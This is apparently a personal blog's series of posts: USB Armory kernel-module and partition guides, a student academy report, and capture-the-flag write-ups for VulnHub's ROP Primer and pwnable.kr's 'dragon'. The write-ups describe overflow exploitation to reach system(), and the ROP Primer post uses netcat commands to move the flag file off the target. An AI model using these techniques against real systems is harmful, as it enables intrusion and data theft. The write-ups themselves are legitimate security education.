USBArmory: LKMs

Hi! I’m going to show you, how you can write and load your own LKMs for the USBArmory.

1. download the kernel source
2. download the .config file used by InversePath
3. compile the kernel and generate all important files
4. write module & makefile
5. insert & remove the module

1.
If you want to write your own modules you’ll need the kernel headers specifically for your running kernel.
If you’re running the latest image, you just need to download the kernel source for linux-4.2.1.

2.
Now we need to download the .config file and place it into the kernel source directory.

3.
Run ‘sudo make; sudo make modules_prepare’ to create all important files.
This can take up quite some time, so grab a coffee or a book.

4.
Finally we can write our own module:

And our Makefile:

You have to insert your path to the kernel source directory.
The ‘-C’ flag points to the kernel sources ( would be /home/usbarmory/linux-4.2.1/ ) and the ‘M’ variable to the directory of your module ( would be /home/usbarmory ).
The ‘modules’ at the end just shows what to build.

You can now enter ‘sudo make’ to build the LKM:

5.
Now you can insert your module into the kernel.

Look at the the last output of ‘dmesg’ to see our module in action:

Unloading works pretty similar:

Again see the output of ‘dmesg’:

To see list of all modules currently loaded, you can enter ‘lsmod’

Have fun writing your own modules!

Carl Smith

Student Academy North-Rhine-Westphalia

Hello guys!

Last week I participated in the Student Academy of North-Rhine-Westphalia for maths and computer science. My school had chosen me to apply at the academy, who then accepted me and invited me to work in groups with 99 of the best math and computer science students of my federal state.
The academy had way over 250 applications, so I am quite proud that they invited me.
There were 16 projects altogether and I have chosen a project that is related more towards computer science than maths. We had to implement a network based computer game to explain networking concepts and custom built protocols.
So in 4 days we wrote about 5200 lines of source code, you can find the game here. Please feel free to download the jar files or even the source code.
We fully developed the code with the Eclipse IDE.

The members of my group where:

Andreas Brüggemann
Alexander Kummutat
Jonas Nötzel
Julian Schmidt
Kai Schenk
Monja Raschke

It was a hell of a week! I am very happy that I was allowed to take part in this project!
With teamwork and a lot of thinking we were able to create something, of which we are very proud of, in this short amount of time.

Carl Smith

ROP Primer Level1

Hey guys!

Here’s my try at Level1 from Bas’ ROP-Primer box.
You can download it on http://www.vulnhub.com. They also have great educational materials related to infosec.

It’s a remote service that is a simple file storage system. It has a handle_conn() function that is vulnerable to an overflow.

I’ve made a two staged exploit that reads in input, the command we want to execute, then stack-pivots to the vulnerable function. After that we send our second stage that executes system() with our previously sent command.
In order to build this exploit I used Peda, a good Plugin for GDB especially for exploit development. But you could also use ropshell.com or the python version.

So with this exploit we can easily execute any command under the owners privileges.

I think the directory ‘/home/level1’ on the remote machine is supposed to have the privileges ‘rwxrwx–x’, so we have to manually change it, otherwise we cannot execute anything.
I think he has fixed this issue in the version 0.2 from Vulnhub.

Since the netcat version installed on the box is the openbsd version, we do not have the “-e” option.
Because of this, we have to pipe the flag into netcat and let it listen for any incoming connections.
Then we just connect with our machine and redirect the output into a file.

The command we execute is ‘cat flag |nc -l 9191’

Then at our own machine we execute ‘nc XX.XX.XX.XX 9191 > flag’

My exploit code does this automatically so you don’t have to change anything, except the IP of the remote machine.

I’ve thoroughly commented the code, so with some experience you should be able to understand what’s happening.
If you don’t have any experience, I would recommend this Primer on return-oriented-programming. Otherwise you can always read corelans tutorials on his webpage.

The Exploit code itself is here.

I created a page where I recommend some books which will give you a good introduction into Software Security, so you can also have a look at that if you want to.

Cheers!
Carl Smith

USB-Armory resizing partition

Here are the complete instructions on how to resize your USB-Armory‘s filesystem to use the whole SD-Card.
We are going to use fdisk and resize2fs to resize the existing partition.

So first we are going to check the partitions.

So we have one partition called mmcblk0p1 that we are going to expand.
We are going to use fdisk to create a new partition in place of the old one.
First press ‘p’ to print out all the existing partitions and then delete the old one ( by pressing ‘d’ ), but remember the starting sector of the existing partition. In my case that would be 10240.

Then create a new one by pressing ‘n’ then ‘p’ for primary, now enter the starting sector, in my case 10240.
Now hit enter to use the full disk. Now we have created our new partition.
Press ‘p’ to verify the existence of our partition.

So after creating the partition we are going to write the changes ( enter ‘w’ ).
Then reboot the USB-Armory.

When the device has rebooted and you successfully logged in, we are going to use resize2fs to resize the filesystem.
When we enter ‘df -h’ we can see that our new filesystem is now 30G big :-)

I hope it worked for you guys!
If you have any questions feel free to ask!

Dragon write-up

I will go through all steps needed to exploit the dragon challenge on pwnable.kr.

This is a remote challenge, so first we need the provided binary for analysis.

after downloading we check the filetype and run it a couple of times.
Also let it create a core dump if it crashes.

After some manual fuzzing we get the desired result; a crash. This looks like we got control.
So let’s open up GDB and check were we would’ve returned.
Don’t forget to load the core.
And look closely….

So upon closer examination we see that our return address consists of our last Input.
AAAA = 0x41414141 ( when thinking in hex )

Now we’ve got control over eip, but what can we do with it ?
We can’t do ret2stack because we just control the eip and nothing valueable would be there.
ROP is not possible because we can’t fake stack frames.
writing to dtors or got is not an option either…

Well then let’s see if we can reuse code of the binary.
Let’s check for the symbols in the binary.

Ah at the end we see the magic call “system()”.
So, the last thing we need is a string to “/bin/sh”.
Let’s check the binary in GDB for the call “system()”.

We see a call to a strange “SecretLevel”, so let us check that.

Wow, there is the system() call.
And just above the system() call something is moved to the stack…
I wonder what that could be….

Jackpot. This is our return address:

RET = 0x08048dbf

so now we’re going to develop our exploit code in python…

Finally test the exploit code and launch it against pwnable.kr’s server.
Don’t forget “cat” to keep our freshly spawned shell alive.

Wohoo, so our exploit works perfectly :-)

Lets launch it against their server and get that flag!

this will spawn the desired shell, so you’re able to view the flag :-)

I hope you liked this write-up!
A pretty simple challenge from pwnable.kr, which gives you 75 pts.
Feel free to write a comment or even contact me if you want to talk about security related stuff.

Carl Smith